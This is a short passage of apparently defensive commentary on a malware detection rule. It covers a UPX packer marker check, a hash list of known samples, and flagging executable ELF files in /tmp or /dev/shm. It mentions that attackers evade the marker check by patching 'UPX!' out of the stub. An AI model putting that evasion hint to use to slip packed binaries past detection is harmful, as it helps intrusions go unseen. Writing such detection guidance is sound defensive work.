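The marker check is cheap but evadable: attackers routinely patch UPX! out of the stub, and the hash list only catches these exact samples. Treat a hit as a reason to pull the file for analysis, and treat an executable ELF appearing in /tmp or /dev/shm at all as worth a look, which is why that condition counts as a hit in its own right.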